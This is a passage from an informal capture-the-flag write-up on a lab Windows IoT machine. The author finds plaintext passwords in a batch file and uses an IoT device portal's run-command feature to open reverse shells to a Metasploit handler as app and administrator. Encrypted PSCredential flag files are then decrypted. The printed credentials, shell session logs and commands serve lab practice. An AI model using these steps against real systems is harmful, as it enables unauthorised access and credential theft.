-a\-\-\-- 10/26/2018 11:36 PM 19397 PesterState.ps1 -a\-\-\-- 10/26/2018 11:36 PM 14444 PesterState.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 14093 SetupTeardown.ps1 -a\-\-\-- 10/26/2018 11:36 PM 5571 SetupTeardown.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 3850 TestDrive.ps1 -a\-\-\-- 10/26/2018 11:36 PM 4180 TestDrive.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 16435 TestResults.ps1 -a\-\-\-- 10/26/2018 11:36 PM 27623 TestResults.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 6700 TestsRunningInCleanRunspace.Te sts.ps1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Functions\\Assertions     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 4129 Be.ps1 -a\-\-\-- 10/26/2018 11:36 PM 3455 Be.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 374 BeGreaterThan.ps1 -a\-\-\-- 10/26/2018 11:36 PM 511 BeGreaterThan.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 365 BeLessThan.ps1 -a\-\-\-- 10/26/2018 11:36 PM 494 BeLessThan.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 389 BeLike.ps1 -a\-\-\-- 10/26/2018 11:36 PM 489 BeLike.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 413 BeLikeExactly.ps1 -a\-\-\-- 10/26/2018 11:36 PM 508 BeLikeExactly.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 579 BeNullOrEmpty.ps1 -a\-\-\-- 10/26/2018 11:36 PM 474 BeNullOrEmpty.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 1395 BeOfType.ps1 -a\-\-\-- 10/26/2018 11:36 PM 691 BeOfType.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 454 Contain.ps1 -a\-\-\-- 10/26/2018 11:36 PM 1004 Contain.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 490 ContainExactly.ps1 -a\-\-\-- 10/26/2018 11:36 PM 865 ContainExactly.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 289 Exist.ps1 -a\-\-\-- 10/26/2018 11:36 PM 999 Exist.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 387 Match.ps1 -a\-\-\-- 10/26/2018 11:36 PM 587 Match.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 425 MatchExactly.ps1 -a\-\-\-- 10/26/2018 11:36 PM 503 MatchExactly.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 2291 PesterThrow.ps1 -a\-\-\-- 10/26/2018 11:36 PM 4928 PesterThrow.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 1013 Set-TestInconclusive.ps1 -a\-\-\-- 10/26/2018 11:36 PM 3239 Should.ps1 -a\-\-\-- 10/26/2018 11:36 PM 5407 Should.Tests.ps1 -a\-\-\-- 10/26/2018 11:36 PM 281 Test-Assertion.ps1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Snippets     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 801 Context.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 805 Describe.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 703 It.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 805 ShouldBe.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 842 ShouldBeGreaterThan.snippets.p s1xml -a\-\-\-- 10/26/2018 11:36 PM 833 ShouldBeLessThan.snippets.ps1x ml -a\-\-\-- 10/26/2018 11:36 PM 840 ShouldBeNullOrEmpty.snippets.p s1xml -a\-\-\-- 10/26/2018 11:36 PM 820 ShouldContain.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 814 ShouldExist.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 814 ShouldMatch.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 814 ShouldNotBe.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 852 ShouldNotBeNullOrEmpty.snippet s.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 833 ShouldNotContain.snippets.ps1x ml -a\-\-\-- 10/26/2018 11:36 PM 827 ShouldNotExist.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 827 ShouldNotMatch.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 831 ShouldNotThrow.snippets.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 818 ShouldThrow.snippets.ps1xml     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 2783 PowerShellGet.psd1 -a\-\-\-- 10/26/2018 11:36 PM 8251 PSGet.Format.ps1xml -a\-\-\-- 10/26/2018 11:36 PM 79986 PSGet.Resource.psd1 -a\-\-\-- 10/26/2018 11:36 PM 584735 PSModule.psm1     Directory: C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\en-US     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- -a\-\-\-- 10/26/2018 11:36 PM 76214 PSGet.Resource.psd1

I was looking at any interesting/abnormal files that I noticed from the output of the above command, when I found r.bat. Printing out the contents of the file shows two commands to change the password for app and administrator. Could these be their passwords?

PS C:\\program files\\windowspowershell\\modules\\packagemanagement\> type r.bat type r.bat \@echo off   :LOOP   for /F \"skip=6\" %%i in (\'net localgroup \"administrators\"\') do net localgroup \"administrators\" %%i /delete   net user app mesh5143 net user administrator \_1nt3rn37ofTh1nGz   ping -n 3 127.0.0.1   cls   GOTO :LOOP   :EXIT

Can I log in with e-winrm? No.

  \~ ·············································································· 3s   15:27:55 ─╮ ❯ evil-winrm -i 10.10.10.204 -u app -p mesh5143 ─╯   Evil-WinRM shell v2.3   Info: Establishing connection to remote endpoint   Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {\"Server\"=\>\"Microsoft-HTTPAPI/2.0\", \"Date\"=\>\"Tue, 15 Sep 2020 02:39:27 GMT\", \"Connection\"=\>\"close\", \"Content-Length\"=\>\"0\"} Body: (404).   Error: Exiting with code 1

Uh. There's no ssh, there's no winrm, how can I access this machine?

Totally forgot about that web portal I found that led me down this in the first place. Can I log in with these creds there? Yes!

Yay! This is some IoT Core Device Portal? Weird. Oh, this is cool. I can see live process dumps and stuff!

 

Hm, there's a run command option. That's cool. I'll just trigger my same reverse shell, since I'm already this user.

 Cool, it worked! What user am I?

msf5 exploit(multi/handler) \> set lport 443 lport =\> 443 msf5 exploit(multi/handler) \> run   \[\*\] Started reverse TCP handler on 10.10.14.16:443 \[\*\] Command shell session 9 opened (10.10.14.16:443 -\> 10.10.10.204:49689) at 2020-09-14 15:43:31 -0400   Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.   PS C:\\windows\\system32\> \$env:UserName \$env:UserName app

Alright. What was that hardening.txt file?

PS C:\\data\\Users\\app\> type hardening.txt type hardening.txt \- changed default administrator password of \"p@ssw0rd\" \- added firewall rules to restrict unnecessary services \- removed administrator account from \"Ssh Users\" group

Weird. There's no ssh that I had noticed. Now to get the user.txt. Wait, wtf, it's still encoded?

What's this part? Is this a powershell module?

\<T\>System.Management.Automation.PSCredential\</T\> \<T\>System.Object\</T\> \</TN\> \<ToString\>System.Management.Automation.PSCredential\</ToString\>

I googled it and found this link: https://docs.microsoft.com/en-us/dotnet/api/system.management.automation.pscredential?view=powershellsdk-7.0.0. Basically it offers centralized username, pwd, and credential management?

The PSCredential.GetNetworkCredential Method returns an equivalent NetworkCredential object for a PSCredential. How can I pass this entire file to that PS module though? Declare a variable. I tried a few things below, but finally got it!

PS C:\\data\\Users\\app\> \$password = \"01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7\" \$password = \"01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7\" PS C:\\data\\Users\\app\> \$password.GetNetworkCredential().Password \$password.GetNetworkCredential().Password Method invocation failed because \[System.String\] does not contain a method named \'GetNetworkCredential\'. At line:1 char:1 \+ \$password.GetNetworkCredential().Password \+ \~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~\~ \+ CategoryInfo : InvalidOperation: (:) \[\], RuntimeException \+ FullyQualifiedErrorId : MethodNotFound PS C:\\data\\Users\\app\> \$credfile = Import-CliXml -Path user.txt \$credfile = Import-CliXml -Path user.txt PS C:\\data\\Users\\app\> \$credfile.GetNetworkCredential() \$credfile.GetNetworkCredential()   UserName Domain \-\-\-\-\-\-\-- \-\-\-\-\-- flag     PS C:\\data\\Users\\app\> \$credfile.GetNetworkCredential().Password \$credfile.GetNetworkCredential().Password 7cfd50f6bc34db3204898f1505ad9d70 PS C:\\data\\Users\\app\>

EoP Enumeration

Wait, can I just do this exact same shit with the admin account? Since I already have that password also? Uh, yes, at least I can log in to the web page.

Yup, I can ls in administrator so...

\[\*\] Started reverse TCP handler on 0.0.0.0:443 \[\*\] Command shell session 1 opened (10.10.14.16:443 -\> 10.10.10.204:49690) at 2020-09-14 16:08:13 -0400   Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.   PS C:\\windows\\system32\> cd c:\\data\\users\\administrator cd c:\\data\\users\\administrator PS C:\\data\\users\\administrator\> ls -force ls -force     Directory: C:\\data\\users\\administrator     Mode LastWriteTime Length Name \-\-\-- \-\-\-\-\-\-\-\-\-\-\-\-- \-\-\-\-\-- \-\-\-- d-r\-\-- 7/3/2020 11:23 PM 3D Objects d\--h\-- 7/3/2020 11:23 PM AppData d\--hsl 7/3/2020 11:23 PM Application Data d\--hsl 7/3/2020 11:23 PM Cookies d-r\-\-- 7/3/2020 11:23 PM Documents d-r\-\-- 7/3/2020 11:23 PM Downloads d\-\-\-\-- 7/3/2020 11:23 PM Favorites d\--hsl 7/3/2020 11:23 PM Local Settings d-r\-\-- 7/3/2020 11:23 PM Music d-r\-\-- 7/3/2020 11:23 PM Pictures d-r\-\-- 7/3/2020 11:23 PM Videos -a-h\-- 9/14/2020 8:14 PM 40960 NTUSER.DAT -a-hs- 7/3/2020 11:23 PM 57344 ntuser.dat.LOG1 -a-hs- 7/3/2020 11:23 PM 71680 ntuser.dat.LOG2 \-\--hs- 7/3/2020 11:23 PM 20 ntuser.ini -ar\-\-- 7/4/2020 9:48 PM 1958 root.txt     PS C:\\data\\users\\administrator\>

Well that's cute, it's the same shit.

PS C:\\data\\users\\administrator\> type root.txt type root.txt \<Objs Version=\"1.1.0.1\" xmlns=\"http://schemas.microsoft.com/powershell/2004/04\"\> \<Obj RefId=\"0\"\> \<TN RefId=\"0\"\> \<T\>System.Management.Automation.PSCredential\</T\> \<T\>System.Object\</T\> \</TN\> \<ToString\>System.Management.Automation.PSCredential\</ToString\> \<Props\> \<S N=\"UserName\"\>flag\</S\> \<SS N=\"Password\"\>01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7\</SS\> \</Props\> \</Obj\> \</Objs\> PS C:\\data\\users\\administrator\>

Import all of the file contents.

PS C:\\data\\users\\administrator\> \$root = Import-CliXml -Path root.txt \$root = Import-CliXml -Path root.txt

Then get that flag.

PS C:\\data\\users\\administrator\> \$root.GetNetworkCredential().Password \$root.GetNetworkCredential().Password 5dbdce5569e2c4708617c0ce6e9bf11d

Next: Passage